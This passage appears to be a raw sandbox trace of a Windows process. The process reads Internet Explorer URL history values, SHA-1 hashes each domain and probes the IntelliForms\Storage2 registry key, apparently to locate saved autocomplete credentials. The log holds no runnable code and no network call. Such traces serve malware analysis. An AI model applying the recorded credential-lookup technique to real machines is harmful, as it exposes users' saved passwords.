phkResult=0x1c4f300*=0x0) returned 0x2 [0249.440] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20119, phkResult=0x1c4f2a0 | out: phkResult=0x1c4f2a0*=0x0) returned 0x2 [0249.440] LocalFree (hMem=0x5d67e60) returned 0x0 [0249.440] RegEnumValueW (in: hKey=0x94c, dwIndex=0x12, lpValueName=0x1c4f510, lpcchValueName=0x1c4f768, lpReserved=0x0, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760 | out: lpValueName="url5", lpcchValueName=0x1c4f768, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760) returned 0x0 [0249.440] StrStrIW (lpFirst="icloud.com", lpSrch="?") returned 0x0 [0249.440] StrStrIW (lpFirst="icloud.com", lpSrch="http://") returned 0x0 [0249.440] CryptAcquireContextW (in: phProv=0x1c4f3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1c4f3e0*=0x5d3a010) returned 1 [0249.441] CryptCreateHash (in: hProv=0x5d3a010, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1c4f3d8 | out: phHash=0x1c4f3d8) returned 1 [0249.441] lstrlenW (lpString="icloud.com") returned 10 [0249.441] CryptHashData (hHash=0x5d9db40, pbData=0x43ed4e0, dwDataLen=0x16, dwFlags=0x0) returned 1 [0249.441] CryptGetHashParam (in: hHash=0x5d9db40, dwParam=0x2, pbData=0x1c4f410, pdwDataLen=0x1c4f4a8, dwFlags=0x0 | out: pbData=0x1c4f410, pdwDataLen=0x1c4f4a8) returned 1 [0249.441] CryptDestroyHash (hHash=0x5d9db40) returned 1 [0249.441] CryptReleaseContext (hProv=0x5d3a010, dwFlags=0x0) returned 1 [0249.441] RegEnumValueW (in: hKey=0x94c, dwIndex=0x13, lpValueName=0x1c4f510, lpcchValueName=0x1c4f768, lpReserved=0x0, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760 | out: lpValueName="url4", lpcchValueName=0x1c4f768, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760) returned 0x0 [0249.441] StrStrIW (lpFirst="txxx.com", lpSrch="?") returned 0x0 [0249.441] StrStrIW (lpFirst="txxx.com", lpSrch="http://") returned 0x0 [0249.441] CryptAcquireContextW (in: phProv=0x1c4f3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1c4f3e0*=0x5d38e10) returned 1 [0249.441] CryptCreateHash (in: hProv=0x5d38e10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1c4f3d8 | out: phHash=0x1c4f3d8) returned 1 [0249.441] lstrlenW (lpString="txxx.com") returned 8 [0249.441] CryptHashData (hHash=0x5d9ea20, pbData=0x43ed4e0, dwDataLen=0x12, dwFlags=0x0) returned 1 [0249.441] CryptGetHashParam (in: hHash=0x5d9ea20, dwParam=0x2, pbData=0x1c4f410, pdwDataLen=0x1c4f4a8, dwFlags=0x0 | out: pbData=0x1c4f410, pdwDataLen=0x1c4f4a8) returned 1 [0249.441] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="30") returned 2 [0249.441] lstrlenW (lpString="") returned 0 [0249.441] lstrlenW (lpString="30") returned 2 [0249.441] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0xd1b3f50 [0249.441] lstrcpyW (in: lpString1=0xd1b3f50, lpString2="" | out: lpString1="") returned="" [0249.442] lstrcatW (in: lpString1="", lpString2="30" | out: lpString1="30") returned="30" [0249.442] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="EF") returned 2 [0249.442] lstrlenW (lpString="30") returned 2 [0249.442] lstrlenW (lpString="EF") returned 2 [0249.442] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x5d33db0 [0249.442] lstrcpyW (in: lpString1=0x5d33db0, lpString2="30" | out: lpString1="30") returned="30" [0249.442] lstrcatW (in: lpString1="30", lpString2="EF" | out: lpString1="30EF") returned="30EF" [0249.442] LocalFree (hMem=0xd1b3f50) returned 0x0 [0249.442] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="99") returned 2 [0249.442] lstrlenW (lpString="30EF") returned 4 [0249.442] lstrlenW (lpString="99") returned 2 [0249.442] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x5d34170 [0249.442] lstrcpyW (in: lpString1=0x5d34170, lpString2="30EF" | out: lpString1="30EF") returned="30EF" [0249.442] lstrcatW (in: lpString1="30EF", lpString2="99" | out: lpString1="30EF99") returned="30EF99" [0249.442] LocalFree (hMem=0x5d33db0) returned 0x0 [0249.442] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="D6") returned 2 [0249.442] lstrlenW (lpString="30EF99") returned 6 [0249.442] lstrlenW (lpString="D6") returned 2 [0249.442] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x5d33db0 [0249.442] lstrcpyW (in: lpString1=0x5d33db0, lpString2="30EF99" | out: lpString1="30EF99") returned="30EF99" [0249.442] lstrcatW (in: lpString1="30EF99", lpString2="D6" | out: lpString1="30EF99D6") returned="30EF99D6" [0249.442] LocalFree (hMem=0x5d34170) returned 0x0 [0249.442] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="36") returned 2 [0249.442] lstrlenW (lpString="30EF99D6") returned 8 [0249.442] lstrlenW (lpString="36") returned 2 [0249.442] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x5d34170 [0249.442] lstrcpyW (in: lpString1=0x5d34170, lpString2="30EF99D6" | out: lpString1="30EF99D6") returned="30EF99D6" [0249.443] lstrcatW (in: lpString1="30EF99D6", lpString2="36" | out: lpString1="30EF99D636") returned="30EF99D636" [0249.443] LocalFree (hMem=0x5d33db0) returned 0x0 [0249.443] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="8D") returned 2 [0249.443] lstrlenW (lpString="30EF99D636") returned 10 [0249.443] lstrlenW (lpString="8D") returned 2 [0249.443] LocalAlloc (uFlags=0x40, uBytes=0x9a) returned 0xd1d0e90 [0249.443] lstrcpyW (in: lpString1=0xd1d0e90, lpString2="30EF99D636" | out: lpString1="30EF99D636") returned="30EF99D636" [0249.443] lstrcatW (in: lpString1="30EF99D636", lpString2="8D" | out: lpString1="30EF99D6368D") returned="30EF99D6368D" [0249.443] LocalFree (hMem=0x5d34170) returned 0x0 [0249.443] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="54") returned 2 [0249.443] lstrlenW (lpString="30EF99D6368D") returned 12 [0249.443] lstrlenW (lpString="54") returned 2 [0249.443] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0xd1d0650 [0249.443] lstrcpyW (in: lpString1=0xd1d0650, lpString2="30EF99D6368D" | out: lpString1="30EF99D6368D") returned="30EF99D6368D" [0249.443] lstrcatW (in: lpString1="30EF99D6368D", lpString2="54" | out: lpString1="30EF99D6368D54") returned="30EF99D6368D54" [0249.443] LocalFree (hMem=0xd1d0e90) returned 0x0 [0249.443] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="7D") returned 2 [0249.443] lstrlenW (lpString="30EF99D6368D54") returned 14 [0249.443] lstrlenW (lpString="7D") returned 2 [0249.443] LocalAlloc (uFlags=0x40, uBytes=0xa2) returned 0xd1d0230 [0249.443] lstrcpyW (in: lpString1=0xd1d0230, lpString2="30EF99D6368D54" | out: lpString1="30EF99D6368D54") returned="30EF99D6368D54" [0249.443] lstrcatW (in: lpString1="30EF99D6368D54", lpString2="7D" | out: lpString1="30EF99D6368D547D") returned="30EF99D6368D547D" [0249.443] LocalFree (hMem=0xd1d0650) returned 0x0 [0249.443] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B6") returned 2 [0249.443] lstrlenW (lpString="30EF99D6368D547D") returned 16 [0249.443] lstrlenW (lpString="B6") returned 2 [0249.443] LocalAlloc (uFlags=0x40, uBytes=0xa6) returned 0xd1cf730 [0249.443] lstrcpyW (in: lpString1=0xd1cf730, lpString2="30EF99D6368D547D" | out: lpString1="30EF99D6368D547D") returned="30EF99D6368D547D" [0249.443] lstrcatW (in: lpString1="30EF99D6368D547D", lpString2="B6" | out: lpString1="30EF99D6368D547DB6") returned="30EF99D6368D547DB6" [0249.443] LocalFree (hMem=0xd1d0230) returned 0x0 [0249.443] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="A4") returned 2 [0249.443] lstrlenW (lpString="30EF99D6368D547DB6") returned 18 [0249.443] lstrlenW (lpString="A4") returned 2 [0249.443] LocalAlloc (uFlags=0x40, uBytes=0xaa) returned 0xd217570 [0249.443] lstrcpyW (in: lpString1=0xd217570, lpString2="30EF99D6368D547DB6" | out: lpString1="30EF99D6368D547DB6") returned="30EF99D6368D547DB6" [0249.443] lstrcatW (in: lpString1="30EF99D6368D547DB6", lpString2="A4" | out: lpString1="30EF99D6368D547DB6A4") returned="30EF99D6368D547DB6A4" [0249.443] LocalFree (hMem=0xd1cf730) returned 0x0 [0249.443] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="5E") returned 2 [0249.443] lstrlenW (lpString="30EF99D6368D547DB6A4") returned 20 [0249.443] lstrlenW (lpString="5E") returned 2 [0249.443] LocalAlloc (uFlags=0x40, uBytes=0xae) returned 0xd2176f0 [0249.443] lstrcpyW (in: lpString1=0xd2176f0, lpString2="30EF99D6368D547DB6A4" | out: lpString1="30EF99D6368D547DB6A4") returned="30EF99D6368D547DB6A4" [0249.443] lstrcatW (in: lpString1="30EF99D6368D547DB6A4", lpString2="5E" | out: lpString1="30EF99D6368D547DB6A45E") returned="30EF99D6368D547DB6A45E" [0249.443] LocalFree (hMem=0xd217570) returned 0x0 [0249.443] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="D5") returned 2 [0249.443] lstrlenW (lpString="30EF99D6368D547DB6A45E") returned 22 [0249.444] lstrlenW (lpString="D5") returned 2 [0249.444] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0xd217db0 [0249.444] lstrcpyW (in: lpString1=0xd217db0, lpString2="30EF99D6368D547DB6A45E" | out: lpString1="30EF99D6368D547DB6A45E") returned="30EF99D6368D547DB6A45E" [0249.444] lstrcatW (in: lpString1="30EF99D6368D547DB6A45E", lpString2="D5" | out: lpString1="30EF99D6368D547DB6A45ED5") returned="30EF99D6368D547DB6A45ED5" [0249.444] LocalFree (hMem=0xd2176f0) returned 0x0 [0249.444] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="9B") returned 2 [0249.444] lstrlenW (lpString="30EF99D6368D547DB6A45ED5") returned 24 [0249.444] lstrlenW (lpString="9B") returned 2 [0249.444] LocalAlloc (uFlags=0x40, uBytes=0xb6) returned 0xd217ff0 [0249.444] lstrcpyW (in: lpString1=0xd217ff0, lpString2="30EF99D6368D547DB6A45ED5" | out: lpString1="30EF99D6368D547DB6A45ED5") returned="30EF99D6368D547DB6A45ED5" [0249.444] lstrcatW (in: lpString1="30EF99D6368D547DB6A45ED5", lpString2="9B" | out: lpString1="30EF99D6368D547DB6A45ED59B") returned="30EF99D6368D547DB6A45ED59B" [0249.444] LocalFree (hMem=0xd217db0) returned 0x0 [0249.444] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="FD") returned 2 [0249.444] lstrlenW (lpString="30EF99D6368D547DB6A45ED59B") returned 26 [0249.444] lstrlenW (lpString="FD") returned 2 [0249.444] LocalAlloc (uFlags=0x40, uBytes=0xba) returned 0xd2151c0 [0249.444] lstrcpyW (in: lpString1=0xd2151c0, lpString2="30EF99D6368D547DB6A45ED59B" | out: lpString1="30EF99D6368D547DB6A45ED59B") returned="30EF99D6368D547DB6A45ED59B" [0249.444] lstrcatW (in: lpString1="30EF99D6368D547DB6A45ED59B", lpString2="FD" | out: lpString1="30EF99D6368D547DB6A45ED59BFD") returned="30EF99D6368D547DB6A45ED59BFD" [0249.444] LocalFree (hMem=0xd217ff0) returned 0x0 [0249.444] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="50") returned 2 [0249.444] lstrlenW (lpString="30EF99D6368D547DB6A45ED59BFD") returned 28 [0249.444] lstrlenW (lpString="50") returned 2 [0249.444] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0xd215290 [0249.444] lstrcpyW (in: lpString1=0xd215290, lpString2="30EF99D6368D547DB6A45ED59BFD" | out: lpString1="30EF99D6368D547DB6A45ED59BFD") returned="30EF99D6368D547DB6A45ED59BFD" [0249.444] lstrcatW (in: lpString1="30EF99D6368D547DB6A45ED59BFD", lpString2="50" | out: lpString1="30EF99D6368D547DB6A45ED59BFD50") returned="30EF99D6368D547DB6A45ED59BFD50" [0249.444] LocalFree (hMem=0xd2151c0) returned 0x0 [0249.444] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="5F") returned 2 [0249.444] lstrlenW (lpString="30EF99D6368D547DB6A45ED59BFD50") returned 30 [0249.444] lstrlenW (lpString="5F") returned 2 [0249.444] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0xd215020 [0249.444] lstrcpyW (in: lpString1=0xd215020, lpString2="30EF99D6368D547DB6A45ED59BFD50" | out: lpString1="30EF99D6368D547DB6A45ED59BFD50") returned="30EF99D6368D547DB6A45ED59BFD50" [0249.444] lstrcatW (in: lpString1="30EF99D6368D547DB6A45ED59BFD50", lpString2="5F" | out: lpString1="30EF99D6368D547DB6A45ED59BFD505F") returned="30EF99D6368D547DB6A45ED59BFD505F" [0249.444] LocalFree (hMem=0xd215290) returned 0x0 [0249.444] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="84") returned 2 [0249.444] lstrlenW (lpString="30EF99D6368D547DB6A45ED59BFD505F") returned 32 [0249.444] lstrlenW (lpString="84") returned 2 [0249.444] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0xd216130 [0249.444] lstrcpyW (in: lpString1=0xd216130, lpString2="30EF99D6368D547DB6A45ED59BFD505F" | out: lpString1="30EF99D6368D547DB6A45ED59BFD505F") returned="30EF99D6368D547DB6A45ED59BFD505F" [0249.444] lstrcatW (in: lpString1="30EF99D6368D547DB6A45ED59BFD505F", lpString2="84" | out: lpString1="30EF99D6368D547DB6A45ED59BFD505F84") returned="30EF99D6368D547DB6A45ED59BFD505F84" [0249.444] LocalFree (hMem=0xd215020) returned 0x0 [0249.444] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="E8") returned 2 [0249.444] lstrlenW (lpString="30EF99D6368D547DB6A45ED59BFD505F84") returned 34 [0249.444] lstrlenW (lpString="E8") returned 2 [0249.444] LocalAlloc (uFlags=0x40, uBytes=0xca) returned 0x5d67e60 [0249.444] lstrcpyW (in: lpString1=0x5d67e60, lpString2="30EF99D6368D547DB6A45ED59BFD505F84" | out: lpString1="30EF99D6368D547DB6A45ED59BFD505F84") returned="30EF99D6368D547DB6A45ED59BFD505F84" [0249.445] lstrcatW (in: lpString1="30EF99D6368D547DB6A45ED59BFD505F84", lpString2="E8" | out: lpString1="30EF99D6368D547DB6A45ED59BFD505F84E8") returned="30EF99D6368D547DB6A45ED59BFD505F84E8" [0249.445] LocalFree (hMem=0xd216130) returned 0x0 [0249.445] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="C6") returned 2 [0249.445] lstrlenW (lpString="30EF99D6368D547DB6A45ED59BFD505F84E8") returned 36 [0249.445] lstrlenW (lpString="C6") returned 2 [0249.445] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x5d667a0 [0249.445] lstrcpyW (in: lpString1=0x5d667a0, lpString2="30EF99D6368D547DB6A45ED59BFD505F84E8" | out: lpString1="30EF99D6368D547DB6A45ED59BFD505F84E8") returned="30EF99D6368D547DB6A45ED59BFD505F84E8" [0249.445] lstrcatW (in: lpString1="30EF99D6368D547DB6A45ED59BFD505F84E8", lpString2="C6" | out: lpString1="30EF99D6368D547DB6A45ED59BFD505F84E8C6") returned="30EF99D6368D547DB6A45ED59BFD505F84E8C6" [0249.445] LocalFree (hMem=0x5d67e60) returned 0x0 [0249.445] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="C9") returned 2 [0249.445] lstrlenW (lpString="30EF99D6368D547DB6A45ED59BFD505F84E8C6") returned 38 [0249.445] lstrlenW (lpString="C9") returned 2 [0249.445] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x5d67f40 [0249.445] lstrcpyW (in: lpString1=0x5d67f40, lpString2="30EF99D6368D547DB6A45ED59BFD505F84E8C6" | out: lpString1="30EF99D6368D547DB6A45ED59BFD505F84E8C6") returned="30EF99D6368D547DB6A45ED59BFD505F84E8C6" [0249.445] lstrcatW (in: lpString1="30EF99D6368D547DB6A45ED59BFD505F84E8C6", lpString2="C9" | out: lpString1="30EF99D6368D547DB6A45ED59BFD505F84E8C6C9") returned="30EF99D6368D547DB6A45ED59BFD505F84E8C6C9" [0249.445] LocalFree (hMem=0x5d667a0) returned 0x0 [0249.445] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="F1") returned 2 [0249.445] lstrlenW (lpString="30EF99D6368D547DB6A45ED59BFD505F84E8C6C9") returned 40 [0249.445] lstrlenW (lpString="F1") returned 2 [0249.445] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x5d67e60 [0249.445] lstrcpyW (in: lpString1=0x5d67e60, lpString2="30EF99D6368D547DB6A45ED59BFD505F84E8C6C9" | out: lpString1="30EF99D6368D547DB6A45ED59BFD505F84E8C6C9") returned="30EF99D6368D547DB6A45ED59BFD505F84E8C6C9" [0249.445] lstrcatW (in: lpString1="30EF99D6368D547DB6A45ED59BFD505F84E8C6C9", lpString2="F1" | out: lpString1="30EF99D6368D547DB6A45ED59BFD505F84E8C6C9F1") returned="30EF99D6368D547DB6A45ED59BFD505F84E8C6C9F1" [0249.445] LocalFree (hMem=0x5d67f40) returned 0x0 [0249.445] CryptDestroyHash (hHash=0x5d9ea20) returned 1 [0249.445] CryptReleaseContext (hProv=0x5d38e10, dwFlags=0x0) returned 1 [0249.445] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c4f360 | out: phkResult=0x1c4f360*=0x0) returned 0x2 [0249.445] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f300 | out: phkResult=0x1c4f300*=0x0) returned 0x2 [0249.445] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20119, phkResult=0x1c4f2a0 | out: phkResult=0x1c4f2a0*=0x0) returned 0x2 [0249.445] LocalFree (hMem=0x5d67e60) returned 0x0 [0249.445] RegEnumValueW (in: hKey=0x94c, dwIndex=0x14, lpValueName=0x1c4f510, lpcchValueName=0x1c4f768, lpReserved=0x0, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760 | out: lpValueName="url3", lpcchValueName=0x1c4f768, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760) returned 0x0 [0249.445] StrStrIW (lpFirst="nametests.com", lpSrch="?") returned 0x0 [0249.445] StrStrIW (lpFirst="nametests.com", lpSrch="http://") returned 0x0 [0249.445] CryptAcquireContextW (in: phProv=0x1c4f3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1c4f3e0*=0x5d37810) returned 1 [0249.446] CryptCreateHash (in: hProv=0x5d37810, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1c4f3d8 | out: phHash=0x1c4f3d8) returned 1 [0249.446] lstrlenW (lpString="nametests.com") returned 13 [0249.446] CryptHashData (hHash=0x5d9e550, pbData=0x43ed4e0, dwDataLen=0x1c, dwFlags=0x0) returned 1 [0249.446] CryptGetHashParam (in: hHash=0x5d9e550, dwParam=0x2, pbData=0x1c4f410, pdwDataLen=0x1c4f4a8, dwFlags=0x0 | out: pbData=0x1c4f410, pdwDataLen=0x1c4f4a8) returned 1 [0249.446] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="1A") returned 2 [0249.446] lstrlenW (lpString="") returned 0 [0249.446] lstrlenW (lpString="1A") returned 2 [0249.446] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0xd1b3770 [0249.446] lstrcpyW (in: lpString1=0xd1b3770, lpString2="" | out: lpString1="") returned="" [0249.446] lstrcatW (in: lpString1="", lpString2="1A" | out: lpString1="1A") returned="1A" [0249.446] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="0A") returned 2 [0249.446] lstrlenW (lpString="1A") returned 2 [0249.446] lstrlenW (lpString="0A") returned 2 [0249.446] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x5d33db0 [0249.446] lstrcpyW (in: lpString1=0x5d33db0, lpString2="1A" | out: lpString1="1A") returned="1A" [0249.446] lstrcatW (in: lpString1="1A", lpString2="0A" | out: lpString1="1A0A") returned="1A0A" [0249.446] LocalFree (hMem=0xd1b3770) returned 0x0 [0249.446] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="86") returned 2 [0249.446] lstrlenW (lpString="1A0A") returned 4 [0249.446] lstrlenW (lpString="86") returned 2 [0249.446] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x5d34170 [0249.446] lstrcpyW (in: lpString1=0x5d34170, lpString2="1A0A" | out: lpString1="1A0A") returned="1A0A" [0249.446] lstrcatW (in: lpString1="1A0A", lpString2="86" | out: lpString1="1A0A86") returned="1A0A86" [0249.446] LocalFree (hMem=0x5d33db0) returned 0x0 [0249.446] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="F0") returned 2 [0249.446] lstrlenW (lpString="1A0A86") returned 6 [0249.446] lstrlenW (lpString="F0") returned 2 [0249.446] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x5d33db0 [0249.446] lstrcpyW (in: lpString1=0x5d33db0, lpString2="1A0A86" | out: lpString1="1A0A86") returned="1A0A86" [0249.446] lstrcatW (in: lpString1="1A0A86", lpString2="F0" | out: lpString1="1A0A86F0") returned="1A0A86F0" [0249.446] LocalFree (hMem=0x5d34170) returned 0x0 [0249.446] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="ED") returned 2 [0249.446] lstrlenW (lpString="1A0A86F0") returned 8 [0249.446] lstrlenW (lpString="ED") returned 2 [0249.446] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x5d34170 [0249.446] lstrcpyW (in: lpString1=0x5d34170, lpString2="1A0A86F0" | out: lpString1="1A0A86F0") returned="1A0A86F0" [0249.446] lstrcatW (in: lpString1="1A0A86F0", lpString2="ED" | out: lpString1="1A0A86F0ED") returned="1A0A86F0ED" [0249.446] LocalFree (hMem=0x5d33db0) returned 0x0 [0249.446] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="93") returned 2 [0249.446] lstrlenW (lpString="1A0A86F0ED") returned 10 [0249.446] lstrlenW (lpString="93") returned 2 [0249.446] LocalAlloc (uFlags=0x40, uBytes=0x9a) returned 0xd1d09c0 [0249.447] lstrcpyW (in: lpString1=0xd1d09c0, lpString2="1A0A86F0ED" | out: lpString1="1A0A86F0ED") returned="1A0A86F0ED" [0249.447] lstrcatW (in: lpString1="1A0A86F0ED", lpString2="93" | out: lpString1="1A0A86F0ED93") returned="1A0A86F0ED93" [0249.447] LocalFree (hMem=0x5d34170) returned 0x0 [0249.447] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="DD") returned 2 [0249.447] lstrlenW (lpString="1A0A86F0ED93") returned 12 [0249.447] lstrlenW (lpString="DD") returned 2 [0249.447] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0xd1d02e0 [0249.447] lstrcpyW (in: lpString1=0xd1d02e0, lpString2="1A0A86F0ED93" | out: lpString1="1A0A86F0ED93") returned="1A0A86F0ED93" [0249.447] lstrcatW (in: lpString1="1A0A86F0ED93", lpString2="DD" | out: lpString1="1A0A86F0ED93DD") returned="1A0A86F0ED93DD" [0249.447] LocalFree (hMem=0xd1d09c0) returned 0x0 [0249.447] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="61") returned 2 [0249.447] lstrlenW (lpString="1A0A86F0ED93DD") returned 14 [0249.447] lstrlenW (lpString="61") returned 2 [0249.447] LocalAlloc (uFlags=0x40, uBytes=0xa2) returned 0xd1d09c0 [0249.447] lstrcpyW (in: lpString1=0xd1d09c0, lpString2="1A0A86F0ED93DD" | out: lpString1="1A0A86F0ED93DD") returned="1A0A86F0ED93DD" [0249.447] lstrcatW (in: lpString1="1A0A86F0ED93DD", lpString2="61" | out: lpString1="1A0A86F0ED93DD61") returned="1A0A86F0ED93DD61" [0249.447] LocalFree (hMem=0xd1d02e0) returned 0x0 [0249.447] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="33") returned 2 [0249.447] lstrlenW (lpString="1A0A86F0ED93DD61") returned 16 [0249.447] lstrlenW (lpString="33") returned 2 [0249.447] LocalAlloc (uFlags=0x40, uBytes=0xa6) returned 0xd1cf5d0 [0249.447] lstrcpyW (in: lpString1=0xd1cf5d0, lpString2="1A0A86F0ED93DD61" | out: lpString1="1A0A86F0ED93DD61") returned="1A0A86F0ED93DD61" [0249.447] lstrcatW (in: lpString1="1A0A86F0ED93DD61", lpString2="33" | out: lpString1="1A0A86F0ED93DD6133") returned="1A0A86F0ED93DD6133" [0249.447] LocalFree (hMem=0xd1d09c0) returned 0x0 [0249.447] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="90") returned 2 [0249.447] lstrlenW (lpString="1A0A86F0ED93DD6133") returned 18 [0249.447] lstrlenW (lpString="90") returned 2 [0249.447] LocalAlloc (uFlags=0x40, uBytes=0xaa) returned 0xd217ff0 [0249.447] lstrcpyW (in: lpString1=0xd217ff0, lpString2="1A0A86F0ED93DD6133" | out: lpString1="1A0A86F0ED93DD6133") returned="1A0A86F0ED93DD6133" [0249.447] lstrcatW (in: lpString1="1A0A86F0ED93DD6133", lpString2="90" | out: lpString1="1A0A86F0ED93DD613390") returned="1A0A86F0ED93DD613390" [0249.447] LocalFree (hMem=0xd1cf5d0) returned 0x0 [0249.447] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="9C") returned 2 [0249.447] lstrlenW (lpString="1A0A86F0ED93DD613390") returned 20 [0249.447] lstrlenW (lpString="9C") returned 2 [0249.447] LocalAlloc (uFlags=0x40, uBytes=0xae) returned 0xd2180b0 [0249.447] lstrcpyW (in: lpString1=0xd2180b0, lpString2="1A0A86F0ED93DD613390" | out: lpString1="1A0A86F0ED93DD613390") returned="1A0A86F0ED93DD613390" [0249.447] lstrcatW (in: lpString1="1A0A86F0ED93DD613390", lpString2="9C" | out: lpString1="1A0A86F0ED93DD6133909C") returned="1A0A86F0ED93DD6133909C" [0249.447] LocalFree (hMem=0xd217ff0) returned 0x0 [0249.447] _vsnwprintf (in: 